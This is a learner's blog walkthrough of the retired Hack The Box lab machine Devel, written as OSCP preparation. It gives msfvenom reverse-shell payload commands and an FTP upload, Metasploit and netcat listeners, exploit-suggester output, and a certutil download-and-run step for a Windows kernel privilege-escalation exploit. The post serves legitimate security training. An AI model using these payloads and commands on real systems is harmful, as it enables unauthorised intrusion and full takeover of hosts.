HTB: Devel machine with Privilege Escalation Focus inspired by the Heath Adam’s course
Hi, everyone! I’m on the week 3 since I started taking the OSCP course. This week, I decided to focus on going through as many tutorials and walkthrough as possible to gain experience in CTF(Capture The Flag) type boxes. I enrolled in the offensive security path on the https://tryhackme.com/ and finished the initial 3 boxes (Vulnversity, Blue, and Kenobi) as well as one advanced box(steel mountain) earlier this week. (I have been reading and watching PWK modules, too)
While I was going through the Steel Mountain machine, it introduced some privilege escalation topics that I wasn’t familiar with. So, I decided to go through Heath Adam’s Udemy course that I bought some time ago for OSCP preparation to further familiarize myself in the topic. I feel much more confident about enumerating machines and getting an initial access to machines and also some basic tools such as netcat, metasploit and nmap, which I’m happy about.
Here’s my write up for the Devil machine from the Hack The Box as I followed along Heath Adam aka TCM’s privilege escalation course. (I have once rooted the box before from his other course)
The Devel machine is one of the easy machines on the HTB. It’s a retired machine so you’ll have to pay for the subscription($10 in the U.S monthly).
I’ll document both Metaploit and the manual way to root this machine.
Enumeration:
For enumeration, there are many tools we can use to discover any further vulnerabilities we can exploit on. Here are some good ones we can try:
1.winPEAS.exe
net.4 required
2. Seatbelt.exe(compile)
3. Watson.exe(compile) updated
4. SharpUp.exe(compile )
Powershell:
Sherlock.ps1
PowerUp.ps1
jaws-enum.ps1
Other :
windows-exploit-suggester.py(local)
Exploit Suggester (metasploit) https://github.com/AonCyberLabs/Windows-Exploit-Suggester
About this machine:
This machine has port 80 and port 21(with anonymous login enabled) open, which we will utilize both for uploading malicious executable generated by msfvenom and run it by visiting on the site.
Metasploit
For meterpreter shell, create a payload via
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f aspx > metex.aspx
Open up metasploit and use multi/handler exploit.
set payload windows/meterpreter/reverse_tcp
Set other necessary settings(LHOST->tun0 and LPORT) and run it. This is an equivalent to the ncat listener. (waits for an connection)
Upload it via ftp:
ftp command for uploading a file -> push FILE_PATH
Now that the file has been uploaded on the site, visit the file path on the web. i.e) http://10.10.14.9/metex.aspx
This will execute the malicious file and opens up a reverse shell on the metasploit.
Check the username(whoami)
Now that we have a shell, let’s use local_exploit_suggester.
meterpreter > run post/multi/recon/local_exploit_suggester
Example output:
*] 10.10.10.5 — Collecting local exploits for x86/windows…
[*] 10.10.10.5–34 exploit checks are being tried…
[+] 10.10.10.5 — exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 — exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 — exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 — exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 — exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 — exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 — exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 — exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 — exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 — exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 — exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 — exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 — exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
Kernal Exploits with metasploit
Now, we can try using one of the exploits listed and hope it works..!
As TCM emphasizes in the course, we should try exploiting the kernel first as it controls everything.
What’s a kernel?
A computer program that controls everything in the system(translator)
Windows Kernal exploits:https://github.com/SecWiki/windows-kernel-exploits
In the enumeration stage, we discovered that the devel machine is vulnerable to kitrap0d.
10.10.10.5 — exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
background our session and use the exploit — set session, lhost and lport(different lport )
It worked!!
Manual Exploitation
sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f aspx > manual.aspx
Upload the file via ftp and start a netcat listener: nc -nvlp 4444
Visit the site with the correct file path and we should have a shell!
Now we’ve got the shell, let’s try using one of the automated tools. I used https://github.com/AonCyberLabs/Windows-Exploit-Suggester Make sure to follow each step (set the correct database name,etc)
On the shell session, run the sysinfo command and save the output in the same directory as the Exploit Suggester folder(py script)
Command example:
sudo ./windows-exploit-suggester.py -d 2021–07–17-mssb.xls -i systeminfo.txt
example output:
[*] initiating winsploit version 3.3…
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as ‘Windows 7 32-bit’
[*]
[M] MS13–009: Cumulative Security Update for Internet Explorer (2792100) — Critical
[M] MS13–005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) — Important
[E] MS12–037: Cumulative Security Update for Internet Explorer (2699988) — Critical
[*] http://www.exploit-db.com/exploits/35273/ — Internet Explorer 8 — Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ — Internet Explorer 8 — Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12–037), PoC
[*]
[E] MS11–011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) — Important
[M] MS10–073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) — Important
[M] MS10–061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) — Critical
[E] MS10–059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) — Important
[E] MS10–047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) — Important
[M] MS10–015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) — Important
[M] MS10–002: Cumulative Security Update for Internet Explorer (978207) — Critical
[M] MS09–072: Cumulative Security Update for Internet Explorer (976325) — Critical
Kernal Exploit (Manual)
We saw a few Kernel vulnerabilities from our findings. Use this page to find executables.
MS10–015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) — Important
https://www.rapid7.com/db/modules/exploit/windows/local/ms10_015_kitrap0d/ — this will require GUI so it won’t work.
E] MS10–059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) — Important
[E] MS10–047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) — Important
It looks like we have the exploit here — https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 The vulnerability is called Chimichurri.
1. download the exploit
2. start the python webserver
python SimpleHTTPServer 8080
3. on the reverse shell, upload the exploit
``certutil -urlcache -f http://10.10.14.9/MS10-059.exe ms.exe``
save it as any name > ms.exe in this case.
4. run it
this should output the usage
5. open up another netcat with a new port i.e) 5555 and run the exploit.
Now we are on the authority system!
That was a nice walkthrough and documenting every step helped me understand the process better. On to the next machine!
